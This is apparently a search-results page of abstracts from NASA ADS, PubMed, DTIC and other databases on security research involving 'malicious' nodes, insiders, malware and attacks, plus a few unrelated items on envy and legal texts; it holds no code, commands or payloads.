NASA Astrophysics Data System (ADS)

Bisen, Dhananjay; Sharma, Sanjeev

2018-01-01

This paper proposes an agent-based secure enhanced performance approach (AB-SEP) for mobile ad hoc network. In this approach, agent nodes are selected through optimal node reliability as a factor. This factor is calculated on the basis of node performance features such as degree difference, normalised distance value, energy level, mobility and optimal hello interval of node. After selection of agent nodes, a procedure of malicious behaviour detection is performed using fuzzy-based secure architecture (FBSA). To evaluate the performance of the proposed approach, comparative analysis is done with conventional schemes using performance parameters such as packet delivery ratio, throughput, total packet forwarding, network overhead, end-to-end delay and percentage of malicious detection.

Remote software upload techniques in future vehicles and their performance analysis

NASA Astrophysics Data System (ADS)

Hossain, Irina

Updating software in vehicle Electronic Control Units (ECUs) will become a mandatory requirement for a variety of reasons, for examples, to update/fix functionality of an existing system, add new functionality, remove software bugs and to cope up with ITS infrastructure. Software modules of advanced vehicles can be updated using Remote Software Upload (RSU) technique. The RSU employs infrastructure-based wireless communication technique where the software supplier sends the software to the targeted vehicle via a roadside Base Station (BS). However, security is critically important in RSU to avoid any disasters due to malfunctions of the vehicle or to protect the proprietary algorithms from hackers, competitors or people with malicious intent. In this thesis, a mechanism of secure software upload in advanced vehicles is presented which employs mutual authentication of the software provider and the vehicle using a pre-shared authentication key before sending the software. The software packets are sent encrypted with a secret key along with the Message Digest (MD). In order to increase the security level, it is proposed the vehicle to receive more than one copy of the software along with the MD in each copy. The vehicle will install the new software only when it receives more than one identical copies of the software. In order to validate the proposition, analytical expressions of average number of packet transmissions for successful software update is determined. Different cases are investigated depending on the vehicle's buffer size and verification methods. The analytical and simulation results show that it is sufficient to send two copies of the software to the vehicle to thwart any security attack while uploading the software. The above mentioned unicast method for RSU is suitable when software needs to be uploaded to a single vehicle. Since multicasting is the most efficient method of group communication, updating software in an ECU of a large number of vehicles could benefit from it. However, like the unicast RSU, the security requirements of multicast communication, i.e., authenticity, confidentiality and integrity of the software transmitted and access control of the group members is challenging. In this thesis, an infrastructure-based mobile multicasting for RSU in vehicle ECUs is proposed where an ECU receives the software from a remote software distribution center using the road side BSs as gateways. The Vehicular Software Distribution Network (VSDN) is divided into small regions administered by a Regional Group Manager (RGM). Two multicast Group Key Management (GKM) techniques are proposed based on the degree of trust on the BSs named Fully-trusted (FT) and Semi-trusted (ST) systems. Analytical models are developed to find the multicast session establishment latency and handover latency for these two protocols. The average latency to perform mutual authentication of the software vendor and a vehicle, and to send the multicast session key by the software provider during multicast session initialization, and the handoff latency during multicast session is calculated. Analytical and simulation results show that the link establishment latency per vehicle of our proposed schemes is in the range of few seconds and the ST system requires few ms higher time than the FT system. The handoff latency is also in the range of few seconds and in some cases ST system requires less handoff time than the FT system. Thus, it is possible to build an efficient GKM protocol without putting too much trust on the BSs.

Security-Enhanced Push Button Configuration for Home Smart Control.

PubMed

Han, Junghee; Park, Taejoon

2017-06-08

With the emergence of smart and converged home services, the need for the secure and easy interplay of various devices has been increased. Push Button Configuration (PBC) is one of the technologies proposed for easy set-up of a secure session between IT and consumer devices. Although the Wi-Fi Direct specification explicitly states that all devices must support the PBC method, its applicability is very limited. This is because the security vulnerability of PBC can be maliciously exploited so that attackers can make illegitimate sessions with consumer devices. To address this problem, this paper proposes a novel Security-enhanced PBC (SePBC) scheme with which we can uncover suspicious or malicious devices. The proposed mechanism has several unique features. First, we develop a secure handshake distance measurement protocol by preventing an adversary sitting outside the region from maliciously manipulating its distance to be fake. Second, it is compatible with the original Wi-Fi PBC without introducing a brand-new methodology. Finally, SePBC uses lightweight operations without CPU-intensive cryptography computation and employs inexpensive H/W. Moreover, it needs to incur little overhead when there is no attack. This paper also designs and implements the proposed SePBC in the real world. Our experimental results and analysis show that the proposed SePBC scheme effectively defeats attacks on PBC while minimizing the modification of the original PBC equipment.

Security-Enhanced Push Button Configuration for Home Smart Control †

PubMed Central

Han, Junghee; Park, Taejoon

2017-01-01

With the emergence of smart and converged home services, the need for the secure and easy interplay of various devices has been increased. Push Button Configuration (PBC) is one of the technologies proposed for easy set-up of a secure session between IT and consumer devices. Although the Wi-Fi Direct specification explicitly states that all devices must support the PBC method, its applicability is very limited. This is because the security vulnerability of PBC can be maliciously exploited so that attackers can make illegitimate sessions with consumer devices. To address this problem, this paper proposes a novel Security-enhanced PBC (SePBC) scheme with which we can uncover suspicious or malicious devices. The proposed mechanism has several unique features. First, we develop a secure handshake distance measurement protocol by preventing an adversary sitting outside the region from maliciously manipulating its distance to be fake. Second, it is compatible with the original Wi-Fi PBC without introducing a brand-new methodology. Finally, SePBC uses lightweight operations without CPU-intensive cryptography computation and employs inexpensive H/W. Moreover, it needs to incur little overhead when there is no attack. This paper also designs and implements the proposed SePBC in the real world. Our experimental results and analysis show that the proposed SePBC scheme effectively defeats attacks on PBC while minimizing the modification of the original PBC equipment. PMID:28594370

Mitigating Inadvertent Insider Threats with Incentives

NASA Astrophysics Data System (ADS)

Liu, Debin; Wang, Xiaofeng; Camp, L. Jean

Inadvertent insiders are trusted insiders who do not have malicious intent (as with malicious insiders) but do not responsibly managing security. The result is often enabling a malicious outsider to use the privileges of the inattentive insider to implement an insider attack. This risk is as old as conversion of a weak user password into root access, but the term inadvertent insider is recently coined to identify the link between the behavior and the vulnerability. In this paper, we propose to mitigate this threat using a novel risk budget mechanism that offers incentives to an insider to behave according to the risk posture set by the organization. We propose assigning an insider a risk budget, which is a specific allocation of risk points, allowing employees to take a finite number of risk-seeking choice. In this way, the employee can complete her tasks without subverting the security system, as with absolute prohibitions. In the end, the organization penalizes the insider if she fails to accomplish her task within the budget while rewards her in the presence of a surplus. Most importantly. the risk budget requires that the user make conscious visible choices to take electronic risks. We describe the theory behind the system, including specific work on the insider threats. We evaluated this approach using human-subject experiments, which demonstrate the effectiveness of our risk budget mechanism. We also present a game theoretic analysis of the mechanism.

Recommendations for Model Driven Paradigms for Integrated Approaches to Cyber Defense

DTIC Science & Technology

2017-03-06

analogy (e.g., Susceptible, Infected, Recovered [SIR]) • Abstract wargaming: game -theoretic model of cyber conflict without modeling the underlying...malware. 3.7 Abstract Wargaming Here, a game -theoretic process is modeled with moves and effects inspired by cyber conflict but without modeling the...underlying processes of cyber attack and defense. Examples in literature include the following: • Cho J-H, Gao J. Cyber war game in temporal networks

Extension of the Genetic Algorithm Based Malware Strategy Evolution Forecasting Model for Botnet Strategy Evolution Modeling

DTIC Science & Technology

2010-11-01

CHEN, Yan; PAXSON, Vern (2009). Automating Analysis of Large- Scale Botnet Probing Events. ASIACCS 󈧍: Proceedings of the 4th International...2004). Email Virus Propagation Modeling and Analysis. Technical report TRCSE- 03-04. – University of Massachussets, 2004. [37] RAMACHANDRAN, Krishna ...20, 8 pp. [38] STANIFORD, Stuart; PAXSON, Vern ; WEAVER, Nicholas (2002). How to 0wn the Internet in Your Spare Time. Proceedings of the 11 th

Engaging the Nation’s Critical Infrastructure Sector to Deter Cyber Threats

DTIC Science & Technology

2013-03-01

is the component of CyberOps that extends cyber power beyond the defensive boundaries of the GIG to detect, deter, deny, and defeat adversaries... economy .16 DDOS attacks are based on multiple, malware infected personal computers, organized into networks called botnets, and are directed by...not condemn the actions of those involved. Of the two attacks on Estonia and Georgia, it was Estonia that had the greatest damage to its economy

Malware Pandemics

DTIC Science & Technology

2010-09-01

in T-Mobile’s ,𔃽G IP range began expe- riencing extortion popup windows. The popup window notifies the victim that the phone has been hacked , and...range, 192.168.0.0/16. Such scanning may be of particular interest when the victim’s iPhone opportunistically connects to a WiFi LAN for Internet...connected to local WiFi networks should understand that the convenience of their Internet-tethered web, media, and email service, comes with a

A Next Generation Repository for Sharing Sensitive Network and Security Data

DTIC Science & Technology

2018-01-01

submission, and 5 yearly IRB reviews d. Provided legal support for MOA data provider and host agreements and amendments e. Feedback and bug reporting...intrusion detection methods and systems , b) event- reconstruction and evidence-based insights into global trends (e.g., DDoS attacks and malware...propagation), and c) situational awareness (e.g., outage detection). We have leveraged IMPACT’s policy and legal framework to minimize any risks associated

Technical note: Efficient online source identification algorithm for integration within a contamination event management system

NASA Astrophysics Data System (ADS)

Deuerlein, Jochen; Meyer-Harries, Lea; Guth, Nicolai

2017-07-01

Drinking water distribution networks are part of critical infrastructures and are exposed to a number of different risks. One of them is the risk of unintended or deliberate contamination of the drinking water within the pipe network. Over the past decade research has focused on the development of new sensors that are able to detect malicious substances in the network and early warning systems for contamination. In addition to the optimal placement of sensors, the automatic identification of the source of a contamination is an important component of an early warning and event management system for security enhancement of water supply networks. Many publications deal with the algorithmic development; however, only little information exists about the integration within a comprehensive real-time event detection and management system. In the following the analytical solution and the software implementation of a real-time source identification module and its integration within a web-based event management system are described. The development was part of the SAFEWATER project, which was funded under FP 7 of the European Commission.

Bidding Agents That Perpetrate Auction Fraud

NASA Astrophysics Data System (ADS)

Trevathan, Jarrod; McCabe, Alan; Read, Wayne

This paper presents a software bidding agent that inserts fake bids on the seller's behalf to inflate an auction's price. This behaviour is referred to as shill bidding. Shill bidding is strictly prohibited by online auctioneers, as it defrauds unsuspecting buyers by forcing them to pay more for the item. The malicious bidding agent was constructed to aid in developing shill detection techniques. We have previously documented a simple shill bidding agent that incrementally increases the auction price until it reaches the desired profit target, or it becomes too risky to continue bidding. This paper presents an adaptive shill bidding agent which when used over a series of auctions with substitutable items, can revise its strategy based on bidding behaviour in past auctions. The adaptive agent applies a novel prediction technique referred to as the Extremum Consistency (EC) algorithm, to determine the optimal price to aspire for. The EC algorithm has successfully been used in handwritten signature verification for determining the maximum and minimum values in an input stream. The agent's ability to inflate the price has been tested in a simulated marketplace and experimental results are presented.

A Hybrid CPU/GPU Pattern-Matching Algorithm for Deep Packet Inspection

PubMed Central

Chen, Yaw-Chung

2015-01-01

The large quantities of data now being transferred via high-speed networks have made deep packet inspection indispensable for security purposes. Scalable and low-cost signature-based network intrusion detection systems have been developed for deep packet inspection for various software platforms. Traditional approaches that only involve central processing units (CPUs) are now considered inadequate in terms of inspection speed. Graphic processing units (GPUs) have superior parallel processing power, but transmission bottlenecks can reduce optimal GPU efficiency. In this paper we describe our proposal for a hybrid CPU/GPU pattern-matching algorithm (HPMA) that divides and distributes the packet-inspecting workload between a CPU and GPU. All packets are initially inspected by the CPU and filtered using a simple pre-filtering algorithm, and packets that might contain malicious content are sent to the GPU for further inspection. Test results indicate that in terms of random payload traffic, the matching speed of our proposed algorithm was 3.4 times and 2.7 times faster than those of the AC-CPU and AC-GPU algorithms, respectively. Further, HPMA achieved higher energy efficiency than the other tested algorithms. PMID:26437335

A Hybrid CPU/GPU Pattern-Matching Algorithm for Deep Packet Inspection.

PubMed

Lee, Chun-Liang; Lin, Yi-Shan; Chen, Yaw-Chung

2015-01-01

The large quantities of data now being transferred via high-speed networks have made deep packet inspection indispensable for security purposes. Scalable and low-cost signature-based network intrusion detection systems have been developed for deep packet inspection for various software platforms. Traditional approaches that only involve central processing units (CPUs) are now considered inadequate in terms of inspection speed. Graphic processing units (GPUs) have superior parallel processing power, but transmission bottlenecks can reduce optimal GPU efficiency. In this paper we describe our proposal for a hybrid CPU/GPU pattern-matching algorithm (HPMA) that divides and distributes the packet-inspecting workload between a CPU and GPU. All packets are initially inspected by the CPU and filtered using a simple pre-filtering algorithm, and packets that might contain malicious content are sent to the GPU for further inspection. Test results indicate that in terms of random payload traffic, the matching speed of our proposed algorithm was 3.4 times and 2.7 times faster than those of the AC-CPU and AC-GPU algorithms, respectively. Further, HPMA achieved higher energy efficiency than the other tested algorithms.

Appraisal patterns of envy and related emotions.

PubMed

van de Ven, Niels; Zeelenberg, Marcel; Pieters, Rik

2012-06-01

Envy is a frustrating emotion that arises from upward social comparison. Two studies investigated the appraisals that distinguish benign envy (aimed at improving one's own situation) from malicious envy (aimed at pulling down the superior other). Study 1 found that appraisals of deservingness and control potential differentiated both types of envy. We manipulated these appraisals in Study 2 and found that while both did not influence the intensity of envy, they did determine the type of envy that resulted. The more a situation was appraised as undeserved, the more participants experienced malicious envy. Benign envy was experienced more when the situation was not undeserved, and the most when the situation was appraised as both deserved and controllable. The current research also clarifies how the types of envy differ from the related emotions admiration and resentment.

Cyber Security: Big Data Think II Working Group Meeting

NASA Technical Reports Server (NTRS)

Hinke, Thomas; Shaw, Derek

2015-01-01

This presentation focuses on approaches that could be used by a data computation center to identify attacks and ensure malicious code and backdoors are identified if planted in system. The goal is to identify actionable security information from the mountain of data that flows into and out of an organization. The approaches are applicable to big data computational center and some must also use big data techniques to extract the actionable security information from the mountain of data that flows into and out of a data computational center. The briefing covers the detection of malicious delivery sites and techniques for reducing the mountain of data so that intrusion detection information can be useful, and not hidden in a plethora of false alerts. It also looks at the identification of possible unauthorized data exfiltration.

A Secure Scheme for Distributed Consensus Estimation against Data Falsification in Heterogeneous Wireless Sensor Networks.

PubMed

Mi, Shichao; Han, Hui; Chen, Cailian; Yan, Jian; Guan, Xinping

2016-02-19

Heterogeneous wireless sensor networks (HWSNs) can achieve more tasks and prolong the network lifetime. However, they are vulnerable to attacks from the environment or malicious nodes. This paper is concerned with the issues of a consensus secure scheme in HWSNs consisting of two types of sensor nodes. Sensor nodes (SNs) have more computation power, while relay nodes (RNs) with low power can only transmit information for sensor nodes. To address the security issues of distributed estimation in HWSNs, we apply the heterogeneity of responsibilities between the two types of sensors and then propose a parameter adjusted-based consensus scheme (PACS) to mitigate the effect of the malicious node. Finally, the convergence property is proven to be guaranteed, and the simulation results validate the effectiveness and efficiency of PACS.

Security Issues for Mobile Medical Imaging: A Primer.

PubMed

Choudhri, Asim F; Chatterjee, Arindam R; Javan, Ramin; Radvany, Martin G; Shih, George

2015-10-01

The end-user of mobile device apps in the practice of clinical radiology should be aware of security measures that prevent unauthorized use of the device, including passcode policies, methods for dealing with failed login attempts, network manager-controllable passcode enforcement, and passcode enforcement for the protection of the mobile device itself. Protection of patient data must be in place that complies with the Health Insurance Portability and Accountability Act and U.S. Federal Information Processing Standards. Device security measures for data protection include methods for locally stored data encryption, hardware encryption, and the ability to locally and remotely clear data from the device. As these devices transfer information over both local wireless networks and public cell phone networks, wireless network security protocols, including wired equivalent privacy and Wi-Fi protected access, are important components in the chain of security. Specific virtual private network protocols, Secure Sockets Layer and related protocols (especially in the setting of hypertext transfer protocols), native apps, virtual desktops, and nonmedical commercial off-the-shelf apps require consideration in the transmission of medical data over both private and public networks. Enterprise security and management of both personal and enterprise mobile devices are discussed. Finally, specific standards for hardware and software platform security, including prevention of hardware tampering, protection from malicious software, and application authentication methods, are vital components in establishing a secure platform for the use of mobile devices in the medical field. © RSNA, 2015.

Generic Detection of Register Realignment

NASA Astrophysics Data System (ADS)

Ďurfina, Lukáš; Kolář, Dušan

2011-09-01

The register realignment is a method of binary obfuscation and it is used by malware writers. The paper introduces the method how register realignment can be recognized by analysis based on the scattered context grammars. Such an analysis includes exploration of bytes affected by realignment, finding new valid values for them, building the scattered context grammar and parse an obfuscated code by this grammar. The created grammar has LL property--an ability for parsing by this type of grammar.

Generic Detection of Register Realignment

NASA Astrophysics Data System (ADS)

Durfina, Lukáš; Kolář, Dušan

2011-09-01

The register realignment is a method of binary obfuscation and it is used by malware writers. The paper introduces the method how register realignment can be recognized by analysis based on the scattered context grammars. Such an analysis includes exploration of bytes affected by realignment, finding new valid values for them, building the scattered context grammar and parse an obfuscated code by this grammar. The created grammar has LL property—an ability for parsing by this type of grammar.

ARL Summer Student Research Symposium. Volume 1: Select Papers

DTIC Science & Technology

2012-08-01

deploying Android smart phones and tablets on the battlefield, which may be a target for malware. In our research, we attempt to improve static...network. (a) The T1 and MRI images are (b) segmented into different material components. The segmented geometry is then used to create (c) a finite element...towards finding a method to detect mTBI non-invasively. One method in particular includes the use of a magnetic resonance image ( MRI )-based imaging

Cyber for the Middleweight Fighter: Recommendations for Cyberspace Capabilities for the United States Marine Corps

DTIC Science & Technology

2013-02-14

L acts to “provided resources for national and joint kinetic attack requirements.”24 Additionally, the Marine Corps Force Structure Review Group...for unusual system activity and searching for signs of known malware, unlike what is depicted in movies such as Hackers, where opposing cyber...never admitted involvement but the attacks originated in Russia. The FBI code name for the inquiry was Moonlight Maze. 29. Jeffrey Carr, Inside Cyber

Binary Code Extraction and Interface Identification for Security Applications

DTIC Science & Technology

2009-10-02

the functions extracted during the end-to-end applications and at the bottom some additional functions extracted from the OpenSSL library. fact that as...mentioned in Section 5.1 through Section 5.3 and some additional functions that we extract from the OpenSSL library for evaluation purposes. The... OpenSSL functions, the false positives and negatives are measured by comparison with the original C source code. For the malware samples, no source is

The MAL: A Malware Analysis Lexicon

DTIC Science & Technology

2013-02-01

we feel that further exploration of the open source literature is a promising avenue for enlarging the corpus. 2.3 Publishing the MAL Early in the...MAL. We feel that the advantages of this format are well worth the small incremental cost. The distribution of the MAL in this format is under...dictionary. We feel that moving to a richer format such as WordNet or WordVis would greatly improve the usability of the lexicon. 3.5 Improved Hosting The

A new sensors-based covert channel on android.

PubMed

Al-Haiqi, Ahmed; Ismail, Mahamod; Nordin, Rosdiadee

2014-01-01

Covert channels are not new in computing systems, and have been studied since their first definition four decades ago. New platforms invoke thorough investigations to assess their security. Now is the time for Android platform to analyze its security model, in particular the two key principles: process-isolation and the permissions system. Aside from all sorts of malware, one threat proved intractable by current protection solutions, that is, collusion attacks involving two applications communicating over covert channels. Still no universal solution can countermeasure this sort of attack unless the covert channels are known. This paper is an attempt to reveal a new covert channel, not only being specific to smartphones, but also exploiting an unusual resource as a vehicle to carry covert information: sensors data. Accelerometers generate signals that reflect user motions, and malware applications can apparently only read their data. However, if the vibration motor on the device is used properly, programmatically produced vibration patterns can encode stolen data and hence an application can cause discernible effects on acceleration data to be received and decoded by another application. Our evaluations confirmed a real threat where strings of tens of characters could be transmitted errorless if the throughput is reduced to around 2.5-5 bps. The proposed covert channel is very stealthy as no unusual permissions are required and there is no explicit communication between the colluding applications.

A New Sensors-Based Covert Channel on Android

PubMed Central

2014-01-01

Covert channels are not new in computing systems, and have been studied since their first definition four decades ago. New platforms invoke thorough investigations to assess their security. Now is the time for Android platform to analyze its security model, in particular the two key principles: process-isolation and the permissions system. Aside from all sorts of malware, one threat proved intractable by current protection solutions, that is, collusion attacks involving two applications communicating over covert channels. Still no universal solution can countermeasure this sort of attack unless the covert channels are known. This paper is an attempt to reveal a new covert channel, not only being specific to smartphones, but also exploiting an unusual resource as a vehicle to carry covert information: sensors data. Accelerometers generate signals that reflect user motions, and malware applications can apparently only read their data. However, if the vibration motor on the device is used properly, programmatically produced vibration patterns can encode stolen data and hence an application can cause discernible effects on acceleration data to be received and decoded by another application. Our evaluations confirmed a real threat where strings of tens of characters could be transmitted errorless if the throughput is reduced to around 2.5–5 bps. The proposed covert channel is very stealthy as no unusual permissions are required and there is no explicit communication between the colluding applications. PMID:25295311

32 CFR 842.42 - Delegations of authority.

Code of Federal Regulations, 2010 CFR

2010-07-01

... claims in any amount: (i) The Deputy Judge Advocate General. (ii) The Director of Civil Law. (iii) The... process, or malicious prosecution committed by an investigative or law enforcement officer. (4) On-base...

32 CFR 842.42 - Delegations of authority.

Code of Federal Regulations, 2014 CFR

2014-07-01

... claims in any amount: (i) The Deputy Judge Advocate General. (ii) The Director of Civil Law. (iii) The... process, or malicious prosecution committed by an investigative or law enforcement officer. (4) On-base...

32 CFR 842.42 - Delegations of authority.

Code of Federal Regulations, 2011 CFR

2011-07-01

... claims in any amount: (i) The Deputy Judge Advocate General. (ii) The Director of Civil Law. (iii) The... process, or malicious prosecution committed by an investigative or law enforcement officer. (4) On-base...

32 CFR 842.42 - Delegations of authority.

Code of Federal Regulations, 2012 CFR

2012-07-01

... claims in any amount: (i) The Deputy Judge Advocate General. (ii) The Director of Civil Law. (iii) The... process, or malicious prosecution committed by an investigative or law enforcement officer. (4) On-base...

32 CFR 842.42 - Delegations of authority.

Code of Federal Regulations, 2013 CFR

2013-07-01

... claims in any amount: (i) The Deputy Judge Advocate General. (ii) The Director of Civil Law. (iii) The... process, or malicious prosecution committed by an investigative or law enforcement officer. (4) On-base...

Department of Homeland Security

MedlinePlus

... Release Joint Technical Alerts on Malicious North Korean Cyber Activity Today, DHS and FBI released a pair ... María Provide Feedback to DHS Protect Myself from Cyber Attacks Report Cyber Incidents Prepare My Family for ...

Detecting insider activity using enhanced directory virtualization.

DOE Office of Scientific and Technical Information (OSTI.GOV)

Shin, Dongwan; Claycomb, William R.

2010-07-01

Insider threats often target authentication and access control systems, which are frequently based on directory services. Detecting these threats is challenging, because malicious users with the technical ability to modify these structures often have sufficient knowledge and expertise to conceal unauthorized activity. The use of directory virtualization to monitor various systems across an enterprise can be a valuable tool for detecting insider activity. The addition of a policy engine to directory virtualization services enhances monitoring capabilities by allowing greater flexibility in analyzing changes for malicious intent. The resulting architecture is a system-based approach, where the relationships and dependencies between datamore » sources and directory services are used to detect an insider threat, rather than simply relying on point solutions. This paper presents such an architecture in detail, including a description of implementation results.« less

Formal Analysis of Key Integrity in PKCS#11

NASA Astrophysics Data System (ADS)

Falcone, Andrea; Focardi, Riccardo

PKCS#11 is a standard API to cryptographic devices such as smarcards, hardware security modules and usb crypto-tokens. Though widely adopted, this API has been shown to be prone to attacks in which a malicious user gains access to the sensitive keys stored in the devices. In 2008, Delaune, Kremer and Steel proposed a model to formally reason on this kind of attacks. We extend this model to also describe flaws that are based on integrity violations of the stored keys. In particular, we consider scenarios in which a malicious overwriting of keys might fool honest users into using attacker's own keys, while performing sensitive operations. We further enrich the model with a trusted key mechanism ensuring that only controlled, non-tampered keys are used in cryptographic operations, and we show how this modified API prevents the above mentioned key-replacement attacks.

Comparison analysis on vulnerability of metro networks based on complex network

NASA Astrophysics Data System (ADS)

Zhang, Jianhua; Wang, Shuliang; Wang, Xiaoyuan

2018-04-01

This paper analyzes the networked characteristics of three metro networks, and two malicious attacks are employed to investigate the vulnerability of metro networks based on connectivity vulnerability and functionality vulnerability. Meanwhile, the networked characteristics and vulnerability of three metro networks are compared with each other. The results show that Shanghai metro network has the largest transport capacity, Beijing metro network has the best local connectivity and Guangzhou metro network has the best global connectivity, moreover Beijing metro network has the best homogeneous degree distribution. Furthermore, we find that metro networks are very vulnerable subjected to malicious attacks, and Guangzhou metro network has the best topological structure and reliability among three metro networks. The results indicate that the proposed methodology is feasible and effective to investigate the vulnerability and to explore better topological structure of metro networks.

Investigating weaknesses in Android certificate security

NASA Astrophysics Data System (ADS)

Krych, Daniel E.; Lange-Maney, Stephen; McDaniel, Patrick; Glodek, William

2015-05-01

Android's application market relies on secure certificate generation to establish trust between applications and their users; yet, cryptography is often not a priority for application developers and many fail to take the necessary security precautions. Indeed, there is cause for concern: several recent high-profile studies have observed a pervasive lack of entropy on Web-systems leading to the factorization of private keys.1 Sufficient entropy, or randomness, is essential to generate secure key pairs and combat predictable key generation. In this paper, we analyze the security of Android certificates. We investigate the entropy present in 550,000 Android application certificates using the Quasilinear GCD finding algorithm.1 Our results show that while the lack of entropy does not appear to be as ubiquitous in the mobile markets as on Web-systems, there is substantial reuse of certificates only one third of the certificates in our dataset were unique. In other words, we find that organizations frequently reuse certificates for different applications. While such a practice is acceptable under Google's specifications for a single developer, we find that in some cases the same certificates are used for a myriad of developers, potentially compromising Android's intended trust relationships. Further, we observed duplicate certificates being used by both malicious and non-malicious applications. The top 3 repeated certificates present in our dataset accounted for a total of 11,438 separate APKs. Of these applications, 451, or roughly 4%, were identified as malicious by antivirus services.

Vital area identification for U.S. Nuclear Regulatory Commission nuclear power reactor licensees and new reactor applicants.

DOE Office of Scientific and Technical Information (OSTI.GOV)

Whitehead, Donnie Wayne; Varnado, G. Bruce

2008-09-01

U.S. Nuclear Regulatory Commission nuclear power plant licensees and new reactor applicants are required to provide protection of their plants against radiological sabotage, including the placement of vital equipment in vital areas. This document describes a systematic process for the identification of the minimum set of areas that must be designated as vital areas in order to ensure that all radiological sabotage scenarios are prevented. Vital area identification involves the use of logic models to systematically identify all of the malicious acts or combinations of malicious acts that could lead to radiological sabotage. The models available in the plant probabilisticmore » risk assessment and other safety analyses provide a great deal of the information and basic model structure needed for the sabotage logic model. Once the sabotage logic model is developed, the events (or malicious acts) in the model are replaced with the areas in which the events can be accomplished. This sabotage area logic model is then analyzed to identify the target sets (combinations of areas the adversary must visit to cause radiological sabotage) and the candidate vital area sets (combinations of areas that must be protected against adversary access to prevent radiological sabotage). Any one of the candidate vital area sets can be selected for protection. Appropriate selection criteria will allow the licensee or new reactor applicant to minimize the impacts of vital area protection measures on plant safety, cost, operations, or other factors of concern.« less

Legal Aspects of Confrontation

ERIC Educational Resources Information Center

Shannon, Thomas A.

1970-01-01

High school principals are obligated to protect the property and students entrusted to their care. As long as any action they take against student dissenters resorting to violence is non-malicious, they need not fear legal repercussions. (CK)

Streaming PCA with many missing entries.

DOT National Transportation Integrated Search

2015-12-01

This paper considers the problem of matrix completion when some number of the columns are : completely and arbitrarily corrupted, potentially by a malicious adversary. It is well-known that standard : algorithms for matrix completion can return arbit...

Protecting Cryptographic Keys and Functions from Malware Attacks

DTIC Science & Technology

2010-12-01

registers. modifies RSA private key signing in OpenSSL to use the technique. The resulting system has the following features: 1. No special hardware is...the above method based on OpenSSL , by exploiting the Streaming SIMD Extension (SSE) XMM registers of modern Intel and AMD x86-compatible CPU’s [22...one can store a 2048-bit exponent.1 Our prototype is based on OpenSSL 0.9.8e, the Ubuntu 6.06 Linux distribution with a 2.6.15 kernel, and SSE2 which

A Survey of XOR as a Digital Obfuscation Technique in a Corpus of Real Data

DTIC Science & Technology

2014-01-17

changing nine byte key [30]. Even advanced malware, such as Stuxnet, Duqu , Flame, and Red October, were observed to use XOR as the basis of a simple...obfuscation algorithm to hide data that they were stealing [37]. Stuxnet uses a 31-byte key with XOR [15]. Duqu XORs data from its keylogger and sends it...back to its server [37]. Similar to Duqu , Flame employs XOR obfuscation techniques on captured data, but contains extensive data-capturing features

78 FR 65923 - Schedules of Controlled Substances: Placement of Tramadol Into Schedule IV

Federal Register 2010, 2011, 2012, 2013, 2014

2013-11-04

... own motion; (2) at the request of the Secretary of the HHS; or (3) on the petition of any interested... reaction, overmedication, malicious poisoning, and accidental ingestion). Non-medical use may involve...

Consensus-Based Cooperative Spectrum Sensing with Improved Robustness Against SSDF Attacks

NASA Astrophysics Data System (ADS)

Liu, Quan; Gao, Jun; Guo, Yunwei; Liu, Siyang

2011-05-01

Based on the consensus algorithm, an attack-proof cooperative spectrum sensing (CSS) scheme is presented for decentralized cognitive radio networks (CRNs), where a common fusion center is not available and some malicious users may launch attacks with spectrum sensing data falsification (SSDF). Local energy detection is firstly performed by each secondary user (SU), and then, utilizing the consensus notions, each SU can make its own decision individually only by local information exchange with its neighbors rather than any centralized fusion used in most existing schemes. With the help of some anti-attack tricks, each authentic SU can generally identify and exclude those malicious reports during the interactions within the neighborhood. Compared with the existing solutions, the proposed scheme is proved to have much better robustness against three categories of SSDF attack, without requiring any a priori knowledge of the whole network.

A Distributed Energy-Aware Trust Management System for Secure Routing in Wireless Sensor Networks

NASA Astrophysics Data System (ADS)

Stelios, Yannis; Papayanoulas, Nikos; Trakadas, Panagiotis; Maniatis, Sotiris; Leligou, Helen C.; Zahariadis, Theodore

Wireless sensor networks are inherently vulnerable to security attacks, due to their wireless operation. The situation is further aggravated because they operate in an infrastructure-less environment, which mandates the cooperation among nodes for all networking tasks, including routing, i.e. all nodes act as “routers”, forwarding the packets generated by their neighbours in their way to the sink node. This implies that malicious nodes (denying their cooperation) can significantly affect the network operation. Trust management schemes provide a powerful tool for the detection of unexpected node behaviours (either faulty or malicious). Once misbehaving nodes are detected, their neighbours can use this information to avoid cooperating with them either for data forwarding, data aggregation or any other cooperative function. We propose a secure routing solution based on a novel distributed trust management system, which allows for fast detection of a wide set of attacks and also incorporates energy awareness.

DOE Office of Scientific and Technical Information (OSTI.GOV)

Beaver, Justin M; Borges, Raymond Charles; Buckner, Mark A

Critical infrastructure Supervisory Control and Data Acquisition (SCADA) systems were designed to operate on closed, proprietary networks where a malicious insider posed the greatest threat potential. The centralization of control and the movement towards open systems and standards has improved the efficiency of industrial control, but has also exposed legacy SCADA systems to security threats that they were not designed to mitigate. This work explores the viability of machine learning methods in detecting the new threat scenarios of command and data injection. Similar to network intrusion detection systems in the cyber security domain, the command and control communications in amore » critical infrastructure setting are monitored, and vetted against examples of benign and malicious command traffic, in order to identify potential attack events. Multiple learning methods are evaluated using a dataset of Remote Terminal Unit communications, which included both normal operations and instances of command and data injection attack scenarios.« less

The emotional responses of browsing Facebook: Happiness, envy, and the role of tie strength.

PubMed

Lin, Ruoyun; Utz, Sonja

2015-11-01

On Facebook, users are exposed to posts from both strong and weak ties. Even though several studies have examined the emotional consequences of using Facebook, less attention has been paid to the role of tie strength. This paper aims to explore the emotional outcomes of reading a post on Facebook and examine the role of tie strength in predicting happiness and envy. Two studies - one correlational, based on a sample of 207 American participants and the other experimental, based on a sample of 194 German participants - were conducted in 2014. In Study 2, envy was further distinguished into benign and malicious envy. Based on a multi-method approach, the results showed that positive emotions are more prevalent than negative emotions while browsing Facebook. Moreover, tie strength is positively associated with the feeling of happiness and benign envy, whereas malicious envy is independent of tie strength after reading a (positive) post on Facebook.

Radiological Exposure Devices (RED) Technical Basis for Threat Profile.

DOE Office of Scientific and Technical Information (OSTI.GOV)

Bland, Jesse John; Potter, Charles A.; Homann, Steven

